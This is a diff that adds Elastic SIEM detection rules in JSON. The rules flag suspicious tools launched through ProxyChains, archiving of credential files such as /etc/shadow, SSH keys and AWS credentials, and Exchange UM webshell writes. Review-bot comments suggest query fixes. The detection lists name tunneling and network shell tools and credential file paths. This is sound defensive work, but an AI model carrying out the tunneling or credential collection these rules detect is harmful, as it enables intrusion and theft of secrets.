@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Utility Launched via ProxyChains", + "note": "## Triage and analysis\n\n### Investigating Suspicious Utility Launched via ProxyChains\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for a list of suspicious processes spawned through `proxychains` by analyzing process command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"proxychains\" and process.args : (\n \"ssh\", \"sshd\", \"sshuttle\", \"socat\", \"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\",\n \"ssf\", \"3proxy\", \"ngrok\", \"gost\", \"pivotnacci\", \"chisel*\", \"nmap\", \"ping\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\", \"ftp\", \"curl\", \"wget\"\n)\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_7.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_7.json new file mode 100644 index 00000000000..88d5c389fcd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_7.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Utility Launched via ProxyChains", + "note": "## Triage and analysis\n\n### Investigating Suspicious Utility Launched via ProxyChains\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for a list of suspicious processes spawned through `proxychains` by analyzing process command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"proxychains\" and process.args : (\n \"ssh\", \"sshd\", \"sshuttle\", \"socat\", \"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\",\n \"ssf\", \"3proxy\", \"ngrok\", \"gost\", \"pivotnacci\", \"chisel*\", \"nmap\", \"ping\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\", \"ftp\", \"curl\", \"wget\"\n)\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_208.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_208.json new file mode 100644 index 00000000000..7cea2ad4b50 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_208.json 
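Review bot: The `process.args` list in `query` carries `\"telnet\"` twice, once after `\"ncat\"` and again after `\"java\"`; the second occurrence is redundant and should be dropped so the tail reads `\"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"ftp\", \"curl\", \"wget\"`. Because `process.args :` matches any argument position, the rule fires whenever one of these names appears anywhere in the argument vector (including as an argument to the wrapped tool), which is presumably intended but is worth a sentence in `description` so tuners know why an alert matched. The same duplicate is present in the `_6` version of this rule, whose hunk starts before this chunk.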
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Sensitive Files Compression", + "new_terms_fields": [ + "host.id", + "process.command_line", + "process.parent.executable" + ], + "query": "event.category:process and host.os.type:linux and event.type:start and\n process.name:(zip or tar or gzip or hdiutil or 7z) and\n process.args:\n (\n /root/.ssh/id_rsa or\n /root/.ssh/id_rsa.pub or\n /root/.ssh/id_ed25519 or\n /root/.ssh/id_ed25519.pub or\n /root/.ssh/authorized_keys or\n /root/.ssh/authorized_keys2 or\n /root/.ssh/known_hosts or\n /root/.bash_history or\n /etc/hosts or\n /home/*/.ssh/id_rsa or\n /home/*/.ssh/id_rsa.pub or\n /home/*/.ssh/id_ed25519 or\n /home/*/.ssh/id_ed25519.pub or\n /home/*/.ssh/authorized_keys or\n /home/*/.ssh/authorized_keys2 or\n /home/*/.ssh/known_hosts or\n /home/*/.bash_history or\n /root/.aws/credentials or\n /root/.aws/config or\n /home/*/.aws/credentials or\n /home/*/.aws/config or\n /root/.docker/config.json or\n /home/*/.docker/config.json or\n /etc/group or\n /etc/passwd or\n /etc/shadow or\n /etc/gshadow\n )\n", + "references": [ + "https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, 
+ "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.001", + "name": "Credentials In Files", + "reference": "https://attack.mitre.org/techniques/T1552/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + 
}, + "id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_107.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_107.json new file mode 100644 index 00000000000..83286145ff7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_107.json 
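Review bot: `process.name:(zip or tar or gzip or hdiutil or 7z)` in `query` includes `hdiutil`, a macOS disk-image utility, while the same query is scoped to `host.os.type:linux`, so that term cannot match here and looks carried over from a macOS variant; either drop it or replace it with Linux archivers that are currently absent, such as `bzip2`, `xz` or `zstd`. The key-file list covers `id_rsa` and `id_ed25519` but not `id_ecdsa` or `id_dsa`, which live in the same `.ssh` directories and would close a visible gap at no cost. Listing `process.command_line` in `new_terms_fields` means every distinct command line is a fresh term per host and parent executable — presumably intended, but worth stating in `description` so operators understand the alert volume.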
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858.", + "false_positives": [ + "Files generated during installation will generate a lot of noise, so the rule should only be enabled after the fact.", + "This rule was tuned using the following baseline: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/Baselines/baseline_15.2.792.5.csv from Microsoft. Depending on version, consult https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines to help determine normalcy." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Server UM Writing Suspicious Files", + "note": "## Triage and analysis\n\nPositive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines).\n\nMicrosoft highly recommends that the best course of action is patching, but this may not protect already compromised systems\nfrom existing intrusions. 
Other tools for detecting and mitigating can be found within their Exchange support\n[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security)\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : (\"UMWorkerProcess.exe\", \"umservice.exe\") and\n file.extension : (\"php\", \"jsp\", \"js\", \"aspx\", \"asmx\", \"asax\", \"cfm\", \"shtml\") and\n (\n file.path : \"?:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\" or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\*\" and\n not (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\version\\\\*\" or\n file.name : (\"errorFE.aspx\", \"expiredpassword.aspx\", \"frowny.aspx\", \"GetIdToken.htm\", \"logoff.aspx\",\n \"logon.aspx\", \"OutlookCN.aspx\", \"RedirSuiteServiceProxy.aspx\", \"signout.aspx\"))) or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\ecp\\\\auth\\\\*\" and\n not file.name : \"TimeoutLogoff.aspx\")\n )\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", + "setup": "## Setup\n\nIf 
enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "6cd1779c-560f-4b68-a8f1-11009b27fe63_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_108.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_108.json new file mode 100644 index 00000000000..de579c531b0 --- /dev/null +++ 